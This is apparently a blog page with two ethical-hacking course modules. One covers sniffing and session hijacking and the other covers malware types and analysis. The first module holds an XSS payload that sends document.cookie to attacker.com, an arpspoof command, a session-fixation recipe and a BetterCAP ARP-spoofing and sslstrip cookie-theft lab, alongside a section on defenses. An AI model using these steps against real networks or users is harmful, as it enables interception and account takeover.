Sniffing & Session Hijacking

Introduction

Sniffing and session hijacking are critical network attacks where an attacker intercepts and manipulates network traffic to steal sensitive data or take over authenticated sessions. This guide covers techniques, tools, and defenses.


1. Network Sniffing

What is Sniffing?

- Capturing and analyzing network traffic.

- Used for passive reconnaissance (e.g., stealing passwords, cookies).

- Works on unencrypted (HTTP, FTP, Telnet) and weakly encrypted protocols.


Types of Sniffing

1. Passive Sniffing 

   - Works on hubs (broadcast traffic).  

   - Attacker silently captures packets.  


2. Active Sniffing  

   - Works on switched networks (requires ARP spoofing).  

   - Techniques: ARP Poisoning, MAC Flooding, DNS Spoofing.  


Sniffing Tools

| Tool | Purpose |

|------|---------|

|   Wireshark  | GUI-based packet analyzer |

|    Tcpdump  | Command-line packet capture |

|     Ettercap   | MITM (Man-in-the-Middle) attacks |

|  BetterCAP  | Advanced MITM framework |

|      dsniff      | Password sniffing |


How to Perform Sniffing?

Step 1: Set Up Promiscuous Mode

bash

ifconfig eth0 promisc  # Enable promiscuous mode


Step 2: Capture Traffic with Wireshark

- Open Wireshark → Select interface → Start capture.

- Apply filters (e.g., http , ftp , tcp.port == 80`).


Step 3: Analyze Packets

- Look for plaintext passwords (HTTP, FTP).

- Extract cookies (`Cookie:` header in HTTP).


2. Session Hijacking

What is Session Hijacking?

- Stealing a valid session token (cookie, session ID) to impersonate a user.

- Common targets: Web apps, SSH, RDP, Telnet.


Types of Session Hijacking

|     Type         |        Method         |

|         ------     |          --------         |

|    Predictable Session Tokens     | Guessing weak session IDs |

|        Session Sidejacking      |      Sniffing unencrypted cookies |

|       Session Fixation   |       Forcing a victim to use attacker’s session ID |

|  Cross-Site Scripting (XSS)   | Stealing cookies via JavaScript |

| Man-in-the-Middle (MITM) | Intercepting and modifying traffic |


Session Hijacking Tools

| Tool  | Purpose |

|------|---------|

|    Burp Suite  | Intercepting & modifying HTTP sessions |

| ZAP (OWASP) | Web app session hijacking |

|        Ferret         |      Cookie hijacking tool |

|     Hamster       | Sidejacking tool (with Ferret) |

|      Ettercap      | MITM-based session hijacking |


How to Perform Session Hijacking?

Method 1: Cookie Theft via XSS

1. Inject malicious script:

  javascript

   document.location='http://attacker.com/steal.php?cookie='+document.cookie;

  2. Capture stolen cookie on attacker’s server (steal.php logs cookies).


Method 2: ARP Spoofing + Cookie Sniffing

1. ARP Poisoning (redirect traffic to attacker):

   bash

   arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

2. Use Wireshark or Ettercap to sniff cookies.

3. Modify browser cookies (Chrome DevTools → Application → Cookies).


Method 3: Session Fixation

1. Generate a fake session ID (PHPSESSID=attacker123).

2. Trick victim into using it (via phishing).

3. When victim logs in, attacker reuses the same session.


3. Defenses Against Sniffing & Hijacking

Preventing Sniffing

✔ Encrypt traffic (HTTPS, SSH, VPN).  

✔ Disable unused protocols (Telnet, FTP).  

✔ Use ARP spoofing detection (ARPWatch, XArp).  

✔ Network segmentation (VLANs, firewalls).  


Preventing Session Hijacking

✔ Use HTTPS (SSL/TLS) for all web traffic.  

✔ Secure cookies (HttpOnly ,  Secure ,  SameSite  flags).  

✔ Regenerate session IDs  after login.  

✔ Implement CSRF tokens .  

✔ Monitor abnormal logins (IP changes, multiple sessions).  


4. Hands-On Lab

Lab: Stealing Cookies with BetterCAP

1. Install BetterCAP:

   bash

   sudo apt install bettercap

2. Start ARP spoofing:

   bash

   sudo bettercap -iface eth0  

   > net.probe on

   > net.recon on

   > arp.spoof on

   

3. Sniff HTTP traffic:

   bash

   > set http.proxy.sslstrip true  

   > http.proxy on

  

4. Analyze stolen cookies in BetterCAP logs.

  1. Search logs for Cookie: or Set-Cookie: headers.

  2. Extract session tokens (e.g., PHPSESSIDJSESSIONID).

  3. Check for missing security flags (SecureHttpOnly).

  4. Test cookie validity via curl or Burp Suite.

  5. Recommend HTTPS, secure flags, and HSTS to prevent future theft.

Stolen cookies enable session hijacking if unprotected.

Conclusion

- Sniffing = Capturing unencrypted traffic.  

- Session Hijacking = Stealing active sessions.  

- Defenses = Encryption, secure cookies, monitoring.  

🔹 Next Steps: 

 Module 7: Web Application Hacking 

- Try HTTPS decryption (SSLstrip, mitmproxy).  

- Explore browser security (CSP, HSTS).  

- Practice on CTF challenges  (Hack The Box, TryHackMe).  


Would you like a step-by-step demo  on intercepting an SSH session? 🚀

No comments:

Malware Threats & Analysis

Introduction to Malware

Malware making is the part of cybersecurity course. Malware (Malicious Software) is any program designed to harm, exploit, or infiltrate a system without the user's consent. It includes viruses, worms, trojans, ransomware, spyware, and more.


Types of Malware

1. Viruses

- Attaches itself to clean files and spreads when executed.

- Example: ILOVEYOU, Melissa.


2. Worms

- Self-replicating malware that spreads over networks.

- Example: WannaCry, Conficker.


3. Trojans

- Disguised as legitimate software but performs malicious actions.

- Example: Zeus , Emotet.


4. Ransomware

- Encrypts files and demands payment for decryption.

- Example: REvil , LockBit.


5. Spyware

- Secretly monitors user activity (keyloggers, screen capture).

- Example: DarkComet , FinFisher.


6. Rootkits

- Gains privileged access and hides malicious processes.

- Example: Stuxnet , TDL4.


7. Adware

- Displays unwanted ads and collects user data.

- Example: Fireball , Superfish.


8. Botnets

- Infected devices controlled remotely (DDoS, spam).

- Example: Mirai , Zeus.


Malware Analysis Techniques

1. Static Analysis

- Examines malware without executing it.

- Tools:  PEiD ,  Exeinfo PE , Strings , IDA Pro , Ghidra.

- Techniques:

  - File hashing (MD5, SHA-1, SHA-256).

  - Header analysis (PE, ELF, Mach-O).

  - Strings extraction.

  - Disassembly & decompilation.


2. Dynamic Analysis

- Executes malware in a controlled environment.

Tools: Cuckoo Sandbox , Process Monitor , Wireshark , FakeNet.

Techniques:

  - API call monitoring.

  - Registry & file system changes.

  - Network traffic analysis.

  - Behavioral analysis.


3. Hybrid Analysis

- Combines static and dynamic techniques.

Tools: Hybrid Analysis , VirusTotal , Joe Sandbox.


Malware Analysis Lab Setup

1. Isolated Environment

- Use virtual machines (VMWare, VirtualBox).

- Disable shared folders & clipboard.

- Use Windows 10/11 (for malware targeting Windows).


2. Analysis Tools

Static Analysis:

  PE Explorer (PE header analysis).  

  Ghidra (reverse engineering).  

  Detect It Easy (DIE) (packer detection).  


Dynamic Analysis:

  - Process Hacker (monitor processes).  

  - ProcMon (registry/file monitoring).  

  - Wireshark (network traffic).  

  - FakeNet-NG (simulate network).  


Sandboxing:  

  - Cuckoo Sandbox (automated analysis).  

  - Any.Run (interactive sandbox).  


3. Malware Samples

Legitimate Sources:  

  - MalwareBazaar (https://bazaar.abuse.ch)  

  - VirusShare (https://virusshare.com)  

  - TheZoo (GitHub repo).  

⚠️ Warning: Never run malware on a host machine. Always use a disposable VM with no internet access.

Step-by-Step Malware Analysis

1. Initial Assessment

- Check file type (`file`, `Exeinfo PE`).

- Calculate hashes (`md5sum`, `sha256sum`).

- Scan with VirusTotal (https://www.virustotal.com).


2. Static Analysis

- Extract strings (`strings`, `FLOSS`).

- Detect packers/obfuscation (`PEiD`, `Detect It Easy`).

- Disassemble with **Ghidra/IDA Pro.


3. Dynamic Analysis

- Run in Cuckoo Sandbox.

- Monitor processes (`Process Hacker`).

- Capture network traffic (`Wireshark`).

- Check persistence mechanisms (Registry, Startup).


4. Reverse Engineering

- Use Ghidra IDA Pro for decompilation.

- Analyze API calls (`Import Address Table`).

- Debug with x64dbg/OllyDbg.


5. Reporting

- Document findings (IOCs, behavior, C2 servers).

- Extract YARA rules for detection.


Advanced Malware Analysis

1. Analyzing Packed Malware

Unpacking Tools:  

  - UPX (for UPX-packed malware).  

  - x64dbg (manual unpacking).  


2. Analyzing Shellcode

Tools:

  - scdbg (shellcode debugger).  

  - Libemu (shellcode emulator).  


3. Analyzing Document-Based Malware (PDF, Office)

Tools: 

  - oleid (Office file analysis).  

  - PDFiD (PDF analysis).  


4. Analyzing Ransomware

- Check encryption routines.

- Look for ransom note patterns.

- Analyze C2 communication.


Malware Detection & Prevention

1. Signature-Based Detection

- Uses known malware hashes (YARA rules, ClamAV).


2. Behavioral Detection

- Monitors unusual activities (Cylance, CrowdStrike).


3. Heuristic Analysis

- Detects unknown malware based on behavior.


4. Endpoint Protection

- EDR (Endpoint Detection & Response) tools:  

  - CrowdStrike Falcon  

  - Microsoft Defender ATP  


5. Network-Based Protection

- Firewalls , IDS/IPS , SIEM (Splunk, ELK).


Conclusion

- Malware analysis requires both static and dynamic techniques.

- Always analyze in a safe, isolated environment.

- Keep learning reverse engineering and behavioral analysis.

- Stay updated with new malware trends (fileless malware, AI-based attacks).


🔹 Next Steps:  

Module 6: Sniffing & Session Hijacking 

- Practice with CTF challenges (MalwareTech, Flare-On).  

- Join malware research communities (Malwarebytes, BleepingComputer).  

- Contribute to open-source malware analysis tools.  



No comments:
Subscribe to: Posts (Atom)